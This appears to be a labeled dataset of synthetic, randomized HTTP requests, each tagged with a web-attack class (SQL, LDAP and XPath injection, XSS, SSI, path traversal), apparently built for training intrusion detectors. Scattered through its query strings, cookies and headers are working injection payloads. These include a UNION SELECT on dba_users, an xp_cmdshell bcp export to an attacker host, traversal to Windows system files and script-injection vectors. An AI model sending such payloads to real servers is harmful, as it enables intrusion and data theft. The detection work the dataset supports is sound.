~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46249
Start - Id: 37384
class: LdapInjection
GET /mLmstrfixs/a.o/ca0cEva.DYM@/reweE9iaHy0o73/tK9B2A6Agvn10lj/zfxBVUG6fN3Y.h.aspx?LeIi=wslntFsser&haateae=6a3kArxF8 HTTP/1.1
Host: www.eirs7peoor.de
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean;q=0.6, iso-8859-1;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Date: Wed, 14 Dec 05 09:36:58 UTC
Expect: eaertym
Max-Forwards: 007
Pragma: no-cache
Referer: http://lxtoissi.biz/echr/lnnoh1/upet/eaitoqow/tupCi.pl
User-Agent: tI)(&(objectClass=yd*)
UA-CPU: 68000

null

End - Id: 37384
Start - Id: 38607
class: LdapInjection
GET /eX/fkk-Q.bin?0QbgsoundCIi=%29++%28+++%7C++%28+++cn%3D*o+%27brien*+%29%28mail++%3D*o%27brien*++%29+++ HTTP/1.0
Host: 130.214.199.222
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.7, deflate, deflate, gzip;q=0.5, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.215.206.53
Cookie: st=9218;qiyjdai5tz=ee37ikfnluiee
Cookie2: $Version="8"
Date: Sun, 07 Aug 05 12:23:18 GMT
ETag: W/"-Yp1G8Ccnlj056rU8yTq"
Expect: trilhrm
From: RwOaaelp@gdhst.com
If-Modified-Since: Fri, 01 Aug 08 13:11:41 GMT
If-Unmodified-Since: Sun, 10 Apr 05 16:00:28 UTC
If-Match: *
If-None-Match: "2IpU2wVio5qrZodNUR"
If-Range: Sat, 07 Mar 09 07:08:49 GMT
Max-Forwards: 3882
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: NTLM YWRiZW9EaHB1cUN6cmdkbDdpdHJuY250NG9haGVkOXFkSWV3bmNlTnU1ZQ==
Range: -348176
Referer: http://stUlEi.ch/vdxsgscr.asmx
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/8.5 (Windows; U; Win98 4.8; on-H7; rv:9.3.9) Gecko/60020568
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2570x635
Via: 4.4 www.heaD.tiff, FTP/2.0 www.OtTn.gif
Transfer-Encoding: deflate
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 156 www.amoaxg.gif "c0dtoegins4aneef" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38607
Start - Id: 42598
class: SqlInjection
GET /quV27FFRTnode/bieay7/uMrJK@/toArarvhhlYjrgowct0/fxIi/QVhkRf4FZk/wer7/ea6/tKgj8uoEE_DU/SMT/n-kmszqkOM.lcWq7.asp?09sotbyweFtod=u%24t&hCo3dD1AoCL=OR++++%27syoob22N%27+++++BETWEEN+++++%27R%27++++AND++++%27T%27&nzxYQus=543&4Jysam7AMF-RTN=elaao7nmh&ogD@NlshaGkL=524&3kPO1PTQhG9=n&sSzfmaweo=hElaoe5t&IgnelArt3xw5sd=eoOyzQ-w&qrisxaetvhdne=senhOkeansoeeU HTTP/1.1
Host: 165.93.46.43
Connection: close
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987;q=0.9
Accept-Encoding: deflate, compress;q=0.9, deflate;q=0.4, gzip;q=0.9, compress;q=0.4
Accept-Language: zahj-dun1
Cache-Control: only-if-cached
Client-ip: 120.51.46.153
Cookie: w6ibJjshutdown=xs;halaiNaifAe=4000
Cookie2: $Version="1"
Date: Fri, 07 Jan 05 13:34:27 GMT
ETag: "g4F.ADGtoFXmb48JvIU"
Expect: 100-continue
From: tehAicae@isHota.com
If-Modified-Since: Fri, 25 May 07 21:31:10 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 45
Authorization: Digest response="AfffDc8D93B23AACB78BEcaDcEB07B62"
Referer: /RhOn/juus/dtDen6e/6aBea7/eefweis.cfm
TE: gzip,trailers
User-Agent: Mozilla/2.7 (X11; U; Open BSD i386 0.2; na-tA; rv:6.5.5) Gecko/52254006
UA-CPU: Sparc
UA-Disp: 478,8453,32
Transfer-Encoding: compress
----: -----------

null

End - Id: 42598
Start - Id: 42297
class: SqlInjection
GET /aaftH/6tro/nxohtaccesdsdallFYjY.sh?hyde7u=%27+%2F**%2F++OR+++%2F**%2F%27%27++%3D%27&hi=%7CluT5Ireplace2lor2&EfiXocnfxq=eoyssxFe1es&admintOgxahaving=dr+bgsoundi&Rr6=rChEq HTTP/1.1
Host: www.atNhRrrtl.gov
Connection: close
Accept: text/*, image/gif;q=0.8
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: min-fresh=030
Client-ip: 135.182.107.81
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Sat, 29 Sep 07 23:32:55 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: qssn
From: 8eae@aimsslc7.net
If-Modified-Since: Tue, 20 May 08 24:32:21 UTC
If-Unmodified-Since: Sun, 13 May 07 12:02:48 UTC
If-Match: *
If-None-Match: "Ov5nFjambTHI4234Ir"
If-Range: *
Max-Forwards: 69
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: Digest response="ACAdAc84Dc5b0C5dCfb8f2241DAA6885"
Range: -568889,-588214
Referer: /aeoleem/vRyacet/oinKj.jpg
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 6.4; de-no; rv:4.4.5) Gecko/21892507
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: FTP/6.4 www.ieIl.gif:705, aeae/7.0 www.tss8og.css
Transfer-Encoding: wtaZya; iEiNota=sh2ite
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 451 www.eiet.jpeg "i5xleaeaz" 
X-Forwarded-For: 116.157.87.80
X-Serial-Number: 04281896370974
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42297
Start - Id: 35441
class: SqlInjection
POST /ouVwFXdP1W/5k/agxdrgk.oleV7/ithhKyOnnzqxerydEha/rL/rXU8KwinntperlJETg_susrq/o2aIS/EZL7/resesitbii/4kdD8CPxv/ashnfNeayulsnrj.jsp? HTTP/1.1
Content-Length: 30
Content-Language: aUt,ei
Content-Encoding: deflate
Content-Location: http://2htrxj.be/HIpoie5/inyhdo2/gnA2lur/rR8roett/lagtt.sh
Content-MD5: YnlhdGV0ZWVlNHdCdG10MA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Apr 09 17:31:06 GMT
Last-Modified: Tue, 06 Jun 06 10:50:27 GMT
Host: www.y5iw.be
Connection: keep-alive
Accept: application/x-tar, application/zip, audio/*
Accept-Charset: *
Accept-Encoding: oesi'    UNION   /**/     SELECT    t0eooezi  FROM     dba_users   WHERE     yfbhtn  like     '%25
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 124.241.147.173
Cookie: tttaiVARr9g=gsdc+8ppchildmOm ;k6p8eHpaiohshu= t;ctayp6xag=oBnyrGesnncAnmm;Zemar=oi$Cg:;2BTgiibaudu=in4gsNemWNeiq
Cookie2: $Version="688"
Date: Mon, 30 Jun 08 07:53:57 UTC
ETag: W/"GegaMDSZMOjF1Os"
Expect: yeewi
If-Modified-Since: Sat, 24 Jul 04 24:42:34 GMT
If-Unmodified-Since: Thu, 05 Feb 04 24:03:40 CET
If-Match: "LTDbEWGlH8-Ce4Gz"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 3.0
Pragma: no-cache
Authorization: NTLM ZG9hMmVkaDZuc3JlZG9uT2VyaWV2b3VuaWVhODZvZWhzaQ==
Referer: /seyoshre.dll
User-Agent: r7Tchfostqha1
UA-OS: Windows 95
Via: 6.2 109.211.211.196
Transfer-Encoding: identity
Warning: 040 www.aads.shtml "Lmnotfsuaiytt" "Wed, 10 Jun 09 05:28:12 CET"
X-Forwarded-For: 128.157.201.106
X-Serial-Number: 8980976
----: -----------
~~~~~: ~~~~~~~~~~~~~~

c9c_10shutdownKF=al2sc1telOwo8

End - Id: 35441
Start - Id: 36066
class: PathTransversal
GET /7iP5EAEgo9/eMwp-connectNLVtIHiTY/nhJ/1rMz3/6tr6dnnnhoooddATsxne/zx9Y@1gjYr0tWhtBdrxx/e6Lw5T_K4BuCj/kaHrnEfm5esa1rne/o6N0cA1/stiTgeoraesFwksAcoAe/Q@Wv/rsca0asRqofsepVuxn.msf?pNKbody=0642179&ccy=pdHnattheNvsxis&acswrnu0=l%3A%5Cwindows%5Cboot.ini&aheese60n=aU9ymnylRnzE&67mtn=4t7cGEIi.&nl5SYDq5t=lxnDq54a&td=2014690&Heu=t+&IQbfCEW2t5=6963494&uatuuhh=n12&pnsD0syhlo=590181&shatomadvdn=vqyC&8nimOeKmjcd=et&nereSwtmx9h=u&ihldijuuehe=E+ee6%5Dl HTTP/1.0
Host: www.e6pem.be
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: koi8-r, windows-1253;q=0.2, iso-8859-5;q=0.6, x-mac-ce;q=0.1
Accept-Encoding: gzip, deflate, deflate, gzip, gzip;q=0.7
Accept-Language: olsbOte-ane, EdWeg6-r6;q=0.8, blaS-l5nane
Cache-Control: Nb=y
Client-ip: 75.78.7.59
Cookie: oordDearbel=2459522
Cookie2: $Version="8"
Date: Thu, 25 Nov 04 13:58:55 CET
ETag: W/"d2LO2WEqbtZNb2rt"
Expect: rnvmO=lketanLl;bJytee
From: Esva@5c4oorIai.it
If-Modified-Since: Thu, 30 Aug 07 17:41:02 GMT
If-Unmodified-Since: Mon, 13 Oct 08 23:45:49 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Apr 10 03:11:44 GMT
Max-Forwards: 0489
MIME-Version: 1.3
Pragma: VHK=soA
Proxy-Authorization: NTLM dW50b2ppZWE3em1vdEFuYWFVRW1jcmVjaGhkZWFzbmhpaWh0SXc=
Authorization: hitiey Ai5g4Eh9=tsvbr
Range: -31,-3,49859-
Referer: http://www.midcf2t4.net/yewOea/7ooo7ac/ueeN/01iess.gif
TE: deflate
Trailer: Warning
User-Agent: Mozilla/5.2 (Windows; U; WinNT 1.0; ao-0e; rv:7.2.5) Gecko/55924330
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: HTTP/4.4 138.50.78.212
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 312 152.156.79.110 "mvw6naexs" "Mon, 19 Sep 05 14:03:29 GMT"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36066
Start - Id: 48867
class: XPathInjection
GET /29o_WlNF/np/yw7sVyRdDYF7JqW-YR.bin?et6zshaiiw=it%29n5xl7&wacjlhwij=oANXtpJ-j7&4eT6eAseiy=hrseriaretia6poah&Wcrg1UtgininR=ssebwogmntisiih&esliAsaro=3&wwdpVoPg=34lT&sv97enooasknHa3=iEbnz%26Cr&tQlAg4xGYjZ=527&nl=irta&nN=7833&mtageAhotwk5b=%28i+++%3C+++count%28ysen6%2Fchild%3A%3Atext%28%29%29++++and+j+%3C++++count%28dmnneo%2Fchild%3A%3Acomment%28%29%29+++++and+++++k+++%3C+count%28dpfr%2Fchild%3A%3A*%29++%29&niihoSe0yi=rkstdinjei%24&sLS16hosemae=exnhefLeeDaeRNIeh&aeydhcuonf=sdlhd&veeuteznOotan6y=no%3Ea HTTP/1.1
Host: www.eng7rih.be
Connection: keep-alive
Accept: video/quicktime;q=0.3, text/*;q=0.2, audio/basic
Accept-Charset: windows-1258;q=0.3, iso-2022-kr
Accept-Encoding: gzip, compress, gzip
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 81.197.139.145
Cookie: Felnsshb=gWUS1IMXXS;pgnwEa=veqch;wfss=97888;zrxLe=fezVi64
Cookie2: $Version="570"
Date: Sun, 14 Mar 10 07:01:28 CET
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Fri, 21 Apr 06 11:00:05 CET
If-Unmodified-Since: Fri, 16 May 08 02:48:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.5
Pragma: M=La
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: 3Elb a13g7hsC=Namthsh
Range: 692-,-672,-664068
Referer: http://www.ntnth.org/knthR/1prtoi/spwl.doc
TE: deflate;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: rtA7aTq http://www.onene1.biz
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/3.5 www.bgipl.css, 1.8 www.qIiie.gif:5476, 6.4 www.ctooTsls.css
Transfer-Encoding: moo1
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48867
Start - Id: 41155
class: SqlInjection
GET /ei1iunawPys/treud0pte.cgi?ri=25292358&zrbis=55&htws=ro&n2servicesmRBj_G5=0ssiLYi&ovf3CS-F=0&upo0upobmncYMha=hirroEs6nlocationd%27&nsiod2=ne+mTd%3Fcne-Et&apA@inDp7oH7=sep0s9l4tvsbata&yn.4X1utL=eigidwaw%25uicrirscript&9gsdne=05&QSLinsertGvF-V4=exec+xp_cmdshell+%27bcp+++++%22select+*+++from++aeE0snte%22++++queryout++pwdump.exe++++-c++++-Craw++++-Shackersip+++++-Usa+++++-Ph8ck3r%27&oteheDEfilurnr=11116&iul6ifiks=sqa HTTP/1.1
Host: 116.190.3.132:80
Connection: keep-alive
Accept: text/plain;q=0.2, image/*
Accept-Charset: x-mac-cyrillic, windows-1252;q=0.9, x-mac-cyrillic;q=0.3
Accept-Encoding: identity;q=0.6, deflate;q=0.5, gzip;q=0.1, gzip;q=0.6
Date: Sat, 14 Oct 06 17:12:12 GMT
From: jrln@tnernm.biz
If-Match: *
Referer: /wEra/dItltc/nF6ewsos/yieno/e09bna.html
TE: trailers,gzip,trailers
User-Agent: Mozilla/4.7 (compatible; Konqueror/7.3; Unix; oeroow; bdw2a; uxz2tsnthn)
Transfer-Encoding: deflate
Warning: 341 www.hatlzo.htm "y5wl" "Thu, 19 Jun 08 12:12:06 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41155
Start - Id: 46527
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: 36.233.29.111
Connection: keep-alive
Accept: audio/x-wav, audio/x-wav, image/*;q=0.8
Accept-Charset: utf-7, shift_jis, x-mac-arabic, windows-1255, euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 246.28.222.74
Cookie: titEncrriH3=9wfxnshz;wqornR=jt9=efOinag;RsB9yr=uel d;datnroeuRtoy=al6/eyoimg>'i
Cookie2: $Version="5"
Date: Thu, 20 May 04 02:07:52 GMT
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 08 May 04 01:24:17 UTC
If-Unmodified-Since: Thu, 11 Aug 05 14:03:30 GMT
If-Match: *
If-None-Match: "C0265eK76TMkHFOOvS"
If-Range: *
Max-Forwards: 6
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: nr1ti raeureu=fttsc
Range: 36325-
Referer: /bnislph/eoFdxfq/gqarwbt/cieun.js
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: tZFTBl0JA http://www.edCsesns.st
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: FTP/4.1 www.qarnNl6.js, aenbe/8.3 www.sndbd.png
Transfer-Encoding: compress
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46527
Start - Id: 47113
class: XSS
GET /lio9ytr/oqVe5itaLdkZKxz@g/goFNBYcLGJm1cqwjF/_-wJZFChtpassjM/jxlWQ0oA4b8ANe0QBmh/lfttnrersrrd/sWc.tIShEezeokU3Ob/Entsvejanfqtdnywz/tXIc4jdhhavingTi/ziO7D3oatt.sh?hoknOang=%3Cdiv++++onmouseover++%3D++%22+%5Balert++%28%276ua8cy%27%29%3B%5D%22++++%3E&ntn1EMtfrrOey=564 HTTP/1.0
Host: 176.247.129.126
Connection: xmL5eo0
Accept: */*;q=0.9
Accept-Charset: windows-1254;q=0.4, hz-gb-2312, iso-2022-jp;q=0.3, iso-8859-1, iso-8859-7;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 11.185.19.209
Cookie: kenloa=Ssietoiihbmifidmu
Cookie2: $Version="3"
Date: Fri, 17 Oct 08 08:28:09 CET
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: eeOu
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Fri, 07 Jul 06 06:14:28 CET
If-Unmodified-Since: Tue, 03 Feb 09 02:18:18 UTC
If-Match: "b8Rs.3rm-fsvzwF"
If-None-Match: "98zpJGWpeo_q@nFI"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.3
Pragma: 8=B
Proxy-Authorization: Basic aEFkYXNYOnF1ZXVE
Authorization: ntshi diiaryeh=tEyo
Range: 049731-813,22-
Referer: http://eaa3Qc.fr/cMr1a/qhuetadU/wstrwtof.jpeg
TE: gzip,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/6.3 (Windows; U; Win98 8.1; iI-ne; rv:9.8.7) Gecko/76968263
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/0.9 146.105.44.113:2791
Transfer-Encoding: identity
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47113
Start - Id: 40850
class: SSI
GET /9olK7rmQeSPOws/T.NPET1CO_0g/mdajEdxrtoeh2atesdtw/l7equRrhxsn/sl/erLheeyeat/h3ite0/h3eS5AJ@5eHVjs/erF/7UmF/rRTK8Q@group byu_ZwBSN/h4oqj5OHCiVm.css?saret=%3C%21--%23odbc+++++statement%3D+%22select+++++yaOrkdlc%2C+i6y2%2C++++ac3+++++from+++++wS050Zhs+++order++++by++++6%2C+++++845%2C++++5%22++--%3E&hur=turv%2BTlerg&erbdheemCI=jbcam HTTP/1.1
Host: 255.233.112.82:80
Connection: close
Accept: text/xml, text/*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: asii-aaeyOv;q=0.6, mtpRa-i4zgYept, MeeE-rt
Cache-Control: no-cache
Client-ip: 183.188.60.40
Cookie: sctr0uTrTyszo=aGP;eeeepr5ostcs1j=qia;dle7aivs=snhq;ehlrnmv=7ue8aLsho;c2tiEny14abD=M
Cookie2: $Version="24"
Date: Fri, 05 Sep 08 02:12:33 GMT
ETag: W/"4hQOpjQi2-3A57Je"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Wed, 10 Sep 08 15:57:11 GMT
If-Unmodified-Since: Mon, 24 Sep 07 15:32:54 UTC
If-Match: "WD4Y3yYdXzMK1.8jb"
If-None-Match: *
If-Range: Wed, 12 May 04 18:12:06 CET
Max-Forwards: 91
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 89-7,-933
Referer: /u2asot.avi
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.5 (compatible; eIde; Open BSD i386; t4sse6t)
UA-CPU: PowerPC
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: Atxfa/0.2 www.wepf.tiff:6674, 6.2 14.204.244.157:08388, HTTP/0.8 www.ernsrn.js
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40850
Start - Id: 45510
class: PathTransversal
GET /ut0h.gtGkCofWzEiyvp/nNwh@71/iLCBYQ1XDM9Hb7KkB/g.044kotelnetx7Cm@/d@6WRpRd_/So/i6/ae91nH.bK/ojyOH45RnNp/1dwVyjMyJiXwGB/cHJjNxz3fOtl.tiff?w5a9edn=veNisot&erntiseaedec=nzTbsneoXef4Eo&lSrsodrudaj=83950482&owyae=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&0eatnmt7=im.4b3&Me3attrsefm=rn HTTP/1.1
Host: www.ioeh7.be
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, iso-8859-5;q=0.1, windows-874;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 34.130.199.77
Cookie: aueloRroa0eiGg=5458;naamgso2e=0281172;heoosPly=5966;ootoToe=oyba2mocha5nnAu;mnoxto9ahw6=gntdaott
Cookie2: $Version="77"
Date: Fri, 23 Feb 07 22:11:44 CET
ETag: "F6K.JXObdJoLwBQ2Ubso"
Expect: 100-continue
From: deeIete@oniiixeM.de
If-Modified-Since: Sun, 15 May 05 10:06:11 GMT
If-Unmodified-Since: Fri, 12 Mar 10 03:24:37 GMT
If-Match: "snS-qjYQJR-3WRd"
If-None-Match: "Ukzg-XudAFLD4q8"
If-Range: Sat, 27 Aug 05 14:38:24 CET
Max-Forwards: 042
MIME-Version: 8.4
Pragma: ltss='w4Phe'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: NTLM UG1uZGE1c2tlcVRlbXNSbmhPaWVtb2lFc21lbWVpb2FLdGFkdHR0YW9w
Range: 354-,63882-
Referer: /epnf0c/lssLs/tneO/flti8tdd/ogow4.gz
TE: deflate
Trailer: Accept
User-Agent: Mozilla/8.0 (compatible; isg2e5lstp; Linux i586; Rsdi; Goia5ilI; ptPahnuTt)
UA-CPU: Sparc
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2096x915
Via: 4.5 www.irtI.tiff, HTTP/3.5 www.aaeh.tiff, aasipd/2.5 91.117.89.130:501
Transfer-Encoding: identity
Upgrade: paa/8.6, yprO/1.1
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45510
Start - Id: 47875
class: XSS
GET /scsuhaieigth6mtE7A/aQdiQcwuQ/dKpasswdP9BAp55r/chtxe52is/bie9dtnn/hUeEdHwcaH-3mQRh/Nkn-42fEX6OmALX.swf?r7ermmehseddlty=%3Cdiv+++style++%3D++%22+behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.mera.com%2Fscript%2Fjihn.pl%5D%29%3B+%22%3E&aa2qeTn=tdnfeolemootekkt&selvrVsesre=rrcp%7CtiommI0o2liborhinput&inacee9he=2473200&yhloqWnmcsi=dSkDT HTTP/1.0
Host: 182.226.175.129
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, x-mac-hebrew;q=0.5, x-mac-roman;q=0.3
Accept-Encoding: gzip, identity;q=0.6, gzip, gzip, gzip;q=0.7
Accept-Language: oe-t, cih9hO-elssdo, eeg-memne;q=0.0, Fr-efghns8
Cache-Control: no-cache
Client-ip: 85.234.191.196
Cookie: 4ae=|dnxp_motlocationbtkn\rey;heenwht4=cYp
Cookie2: $Version="75"
Date: Fri, 27 Nov 09 22:48:53 CET
ETag: "q3-IpkwztXwbCovTL"
Expect: sfpob
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 26 Jul 06 03:59:46 GMT
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: *
If-None-Match: "uWgmd0ocJMciF1VU"
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 77
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic aWlsNm86a2h0eQ==
Authorization: Digest realm
Range: 064-,-6198,422476-
Referer: http://sansn.gov/noDerln5/bthenuwc.css
TE: trailers,chunked,gzip;q=0.9
Trailer: Accept
User-Agent: cedtalu/4.7.0.8.4
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/0.0 47.6.191.167, FTP/2.8 72.223.118.70, 3.1 59.64.29.217
Transfer-Encoding: compress
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47875
Start - Id: 42075
class: SqlInjection
GET /eEOP5Sx.Y/cm/tp/pK9Z1pmLQQ-a/iuWe9m7zPM3Bo/lBpY2k/pmcTw7OWm565.bin?J_DtO@wI4nW=a2c&766Z6tO=89076&2vbye1=sh%25laIj8de&SasLy.I1Qi=4092907&p9T=upsov&amTeOsiby=ottntNeef3elhwn&i5utfmre=eY&op1t3hmAgij54il=508377616&srspebGdlef7o=%27+++%2F**%2F++OR+%2F**%2F++++%27aocn5ao%27+++%3E+++++%27S&l6lvardivcbmraCiframe=38666023&AptxAEheernt=hKC8&41ogt27el=yVYwGDTcWQ&GorEOlhsA=8938072&ehedscaThf9oie=nLR%28oocyd&Tninb0oopd=eDVO0fzD0Oy HTTP/1.0
Host: www.eedoiegsn.uk
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: cnUf-khe;q=0.6
Cache-Control: no-cache
Client-ip: 79.156.167.12
Cookie: r0ssdklo=e window.openboot.inigroup by;eotd2rekltbc==a
Cookie2: $Version="25"
Date: Wed, 28 Apr 10 13:58:09 GMT
ETag: "TL7F2BqC9pqAGBDNy6j"
Expect: 100-continue
From: gan8eOt@rhvog.uk
If-Modified-Since: Mon, 12 Nov 07 21:44:55 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: *
If-None-Match: "09z3NyWNnJAYmcIw"
If-Range: Mon, 06 Sep 04 24:52:23 CET
Max-Forwards: 87
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZXRhb2llOm9ZN2lJ
Authorization: Digest nc=bCcE16fA
Range: 54-40255,-926,-098
Referer: /eassnxcr.js
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: lmElebss http://www.u4arUi4.it
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4241x2926
Via: HTTP/8.0 179.46.94.57
Transfer-Encoding: compress
Upgrade: iaeh/2.5, tesmwr/4.5, wat/8.1, orsno/9.7
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42075
Start - Id: 37000
class: LdapInjection
GET /faLsshuKrzsfOg/nM_aom3homeEmu/enejeb7gssFgcayodhoa/gX/fea/hPeatwltYe/P6Lj-servicesHorg/Te/shloeIfrmevRihjgs/nV1X1Ac.aspx?mEil=1950%29%28%26%28objectClass%3DxtlN%29%28%7C%28sn+++%3D+++ti%29%28cn%3Dnooc+++J*%29%29&jVhacCssta9yD=zQJPSrPLk&So9=tLki5a55xBF&7hideoilnq=394&sbe=8+l&hsiopid1tyU=aoijgHd&si=6120&G-jfh2Y@=48&CENadminxw=etc1Oaoaser2td%5Ccopyw&rx9i0O=2802222773 HTTP/1.1
Host: 87.228.162.142
Connection: keep-alive
Accept: text/*, audio/*;q=0.5
Accept-Charset: windows-1258;q=0.7, iso-8859-2, x-mac-turkish;q=0.1, cp-932;q=0.4
Accept-Encoding: *;q=0.7
